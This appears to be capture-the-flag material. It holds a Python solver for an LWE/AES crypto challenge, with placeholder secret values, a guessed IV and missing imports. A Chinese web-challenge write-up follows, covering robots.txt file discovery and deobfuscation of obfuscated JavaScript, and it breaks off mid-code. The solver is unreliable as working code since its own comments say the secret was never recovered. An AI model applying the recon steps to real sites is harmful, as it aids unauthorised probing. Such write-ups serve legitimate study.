P = [[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C = [[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 
87, 87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 
92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], 
[88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 
50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 
104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 
70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
q = 127

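# NOTE(review): t0, t1, t2 are placeholder values, not a recovered secret --
# the brute-force search mentioned here was never run in this script.  Treat
# `hint` as unverified; nothing after this section reads it.
t0, t1, t2 = 47, 33, 58
s = [1, t0, t1, t2]

# Decode one bit per ciphertext row of C: compute <s, row> mod q and test
# whether the residue is close to q//2 = 63 (bit 1) or not (bit 0).
# The residue is compared unsigned, in [0, q-1].  Lifting it to a signed value
# first would map 64..83 to negative numbers, and those would be read as 0 even
# though they are within 20 of 63.
# NOTE(review): assumes the encoding "1 -> near q//2, 0 -> near 0" stated in
# the original comment -- confirm against the challenge source.
half_q = q // 2
M_bits = []
for row in C:
    inner = sum(s[k] * row[k] for k in range(4)) % q
    M_bits.append(1 if abs(inner - half_q) <= 20 else 0)

# Pack the bits MSB-first into bytes, zero-padding the tail to a multiple of 8.
bits = ''.join(map(str, M_bits))
if len(bits) % 8 != 0:
    bits += '0' * (8 - len(bits) % 8)
hint_bytes = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
# errors='replace' keeps the decode from raising on bytes >= 0x80.
hint = hint_bytes.decode('ascii', errors='replace')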

# The AES key is provided in the problem output
key = b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
encrypted = b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'

# The IV is a guess: no IV is specified, so sixteen zero bytes are assumed.
# In CBC the IV is XORed only into the first plaintext block, so a wrong guess
# garbles the first 16 bytes and leaves every later block intact.
iv = bytes(16)
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted = unpad(cipher.decrypt(encrypted), 16)

# Keep printable ASCII (0x20-0x7e) only; every other byte is dropped, which
# also hides a garbled first block if the IV guess was wrong.
filtered = ''.join(chr(b) for b in decrypted if 32 <= b <= 126)

print("Filtered plaintext:")
print(filtered)


外国山海经

访问/robots.txt,得到

#shu.php  sha.php  wa.php  flag.php  flag.php.swp

访问 flag.php,得到一段经过混淆的 JavaScript,下面对其进行反混淆:


// String-table rotation stub (obfuscator output).
// Called once with the string-array getter _0x219d and a target number. It
// rotates the array returned by the getter until a checksum computed from
// decoded entries equals the target, so that the index-based lookups made
// through _0x2fa2 elsewhere in the script resolve to the intended strings.
(function(_0x5bfa63, _0x281ba4) {
// Constant pools: the numbers below are only ever used as (negated) arguments
// to the two lookup helpers.
var _0x628a90 = {
_0x28e595: 0x190,
_0x466706: 0x17a,
_0x570276: 0x192,
_0x4e238d: 0x128,
_0xf7fd91: 0x139,
_0x4ff7de: 0x144,
_0xf17c9a: 0x132,
_0x140c6f: 0x117,
_0x2e9d5d: 0x124,
_0x27ecfb: 0x16f,
_0x1f08ae: 0x16e,
_0x429bb1: 0x185,
_0x5259a4: 0x186,
_0xf069bc: 0xfc,
_0x36775b: 0xda,
_0x1a81bc: 0x101,
_0x4fbeb3: 0x159,
_0x5f0ac4: 0x16a,
_0x2b1d0c: 0x15f,
_0x45b6b4: 0x160,
_0x542167: 0x17c,
_0x300668: 0x15a,
_0x5d82fc: 0x13b,
_0x4fc9cc: 0x176,
_0x1f53f0: 0x146,
_0x99afde: 0xfe,
_0x39b153: 0xf0,
_0xed7676: 0xef,
_0x3a214b: 0x10c,
_0x18fd83: 0x115,
_0x44ec87: 0x166,
_0x3009e4: 0x163,
_0x362ea9: 0x170
}
, _0x28823e = {
_0x456064: 0x20a
}
, _0xb2ea4e = {
_0x332eb1: 0x262
};
// Lookup helper: forwards to the decoder _0x2fa2 using only its 4th argument
// (plus 0x262) and its 3rd argument; the first two parameters are unused.
function _0x5afd48(_0x372bcf, _0x587d2c, _0x343524, _0x7ab981) {
return _0x2fa2(_0x7ab981 - -_0xb2ea4e._0x332eb1, _0x343524);
}
// The string array itself; the loop below mutates it in place.
var _0x19cd46 = _0x5bfa63();
// Lookup helper: forwards to _0x2fa2 using only its 1st argument (plus 0x20a)
// and its 4th argument; the middle two parameters are unused.
function _0x180c55(_0x65cbe3, _0x1b7dab, _0x513f23, _0x2e4568) {
return _0x2fa2(_0x65cbe3 - -_0x28823e._0x456064, _0x2e4568);
}
// Loop until the checksum matches. On a mismatch, or if evaluating the
// checksum throws, the first array element is moved to the end and the
// checksum is recomputed.
while (!![]) {
try {
// Checksum: a sum of products and quotients of parseInt() applied to decoded
// table entries; the divisors are constant arithmetic expressions.
var _0x27e61b = parseInt(_0x5afd48(-0x18e, -_0x628a90._0x28e595, -_0x628a90._0x466706, -_0x628a90._0x570276)) / (0x1f33 + -0xda2 + -0x1190) * (-parseInt(_0x180c55(-_0x628a90._0x4e238d, -_0x628a90._0xf7fd91, -_0x628a90._0x4ff7de, -_0x628a90._0xf17c9a)) / (-0x97e * -0x2 + 0x8 * -0x98 + 0x25f * -0x6)) + parseInt(_0x180c55(-0x10d, -_0x628a90._0x140c6f, -0x111, -_0x628a90._0x2e9d5d)) / (-0x115 * -0xa + -0x63b + -0x24a * 0x2) * (parseInt(_0x5afd48(-_0x628a90._0x27ecfb, -_0x628a90._0x1f08ae, -_0x628a90._0x429bb1, -_0x628a90._0x5259a4)) / (-0x95 + 0x6c0 + -0x627)) + parseInt(_0x180c55(-_0x628a90._0xf069bc, -0x108, -_0x628a90._0x36775b, -_0x628a90._0x1a81bc)) / (0x14ca + 0xf94 + -0x2459) + -parseInt(_0x5afd48(-_0x628a90._0x4fbeb3, -0x151, -_0x628a90._0x5f0ac4, -0x167)) / (0x11ed + 0x1133 + -0x118d * 0x2) * (-parseInt(_0x5afd48(-_0x628a90._0x2b1d0c, -_0x628a90._0x45b6b4, -_0x628a90._0x542167, -_0x628a90._0x300668)) / (0x1d5 * -0x6 + 0x1 * -0x6dd + 0x11e2)) + -parseInt(_0x5afd48(-_0x628a90._0x5d82fc, -_0x628a90._0x4fc9cc, -_0x628a90._0x1f53f0, -0x157)) / (-0x475 + -0x172a + 0x1ba7) * (parseInt(_0x180c55(-_0x628a90._0x99afde, -_0x628a90._0x39b153, -_0x628a90._0xed7676, -0xde)) / (0x1caa + 0x8ed + 0xd1 * -0x2e)) + parseInt(_0x180c55(-_0x628a90._0x3a214b, -0x119, -0xee, -_0x628a90._0x18fd83)) / (-0x687 + -0x7c8 + 0xe59 * 0x1) * (-parseInt(_0x5afd48(-0x16c, -0x179, -_0x628a90._0x44ec87, -_0x628a90._0x3009e4)) / (-0xdba * -0x2 + -0x21bd + -0xc * -0x87)) + parseInt(_0x5afd48(-_0x628a90._0x362ea9, -_0x628a90._0x3009e4, -0x174, -0x182)) / (0xc54 + -0x91 * 0x1 + 0xbb7 * -0x1);
if (_0x27e61b === _0x281ba4)
break;
else
_0x19cd46['push'](_0x19cd46['shift']());
} catch (_0x412f22) {
_0x19cd46['push'](_0x19cd46['shift']());
}
}
// Target checksum passed as the second argument:
// -0x318d8 + 0x54f5 + 0x75601 = 299550.
}(_0x219d, -0x318d8 + -0x1 * -0x54f5 + 0x75601));
// _0x3587de is the result of an immediately-invoked function: a two-argument
// function (context, callback). The flag _0x14c4a4 starts true and is cleared
// the first time that function hands out a wrapper; afterwards it hands out an
// empty function instead.
// Property names and the strings compared below are fetched through the
// string-table decoder _0x2fa2, so which branch is live cannot be read off
// this listing. Remarks marked NOTE(review) are inferences to confirm once the
// table has been decoded.
var _0x3587de = (function() {
var _0x4021ac = {
_0x58c1ae: 0x13d,
_0x3c3fdf: 0x15a,
_0x51959f: 0x136,
_0x1a346a: 0x267,
_0x970c7c: 0x26b,
_0x450fa8: 0x27d,
_0x3dffdb: 0x27c,
_0x20c184: 0x295,
_0x1d0c10: 0x262,
_0x1fdb73: 0x130,
_0x5a02fe: 0x119,
_0x4ee755: 0x111,
_0x5226ab: 0x11b,
_0xee055f: 0x28b,
_0xede8f3: 0x252,
_0x7e624b: 0x143,
_0x446a52: 0x138,
_0x308418: 0x139,
_0x4ebdea: 0x27e,
_0x26518b: 0x29b,
_0x51d380: 0x28a,
_0x18efbb: 0x275,
_0x1d15b8: 0x13f,
_0x1ab8ab: 0x126,
_0x20ee91: 0x13e,
_0x5cc3e2: 0x157,
_0x330753: 0x260,
_0x182013: 0x272,
_0x217183: 0x27b,
_0x3d043a: 0x26c
}
, _0x5724b4 = {
_0x2f801f: 0x22a,
_0x3e3ff7: 0x225,
_0x4592b5: 0x229,
_0x23ef8d: 0x23d,
_0x4d4486: 0x243,
_0x1c90a0: 0x220,
_0x16effd: 0x251,
_0x4453ae: 0x22f,
_0x53295a: 0x250
}
, _0xb6c053 = {
_0x43286b: 0x152,
_0x21fedd: 0x13b,
_0x2988ea: 0x131,
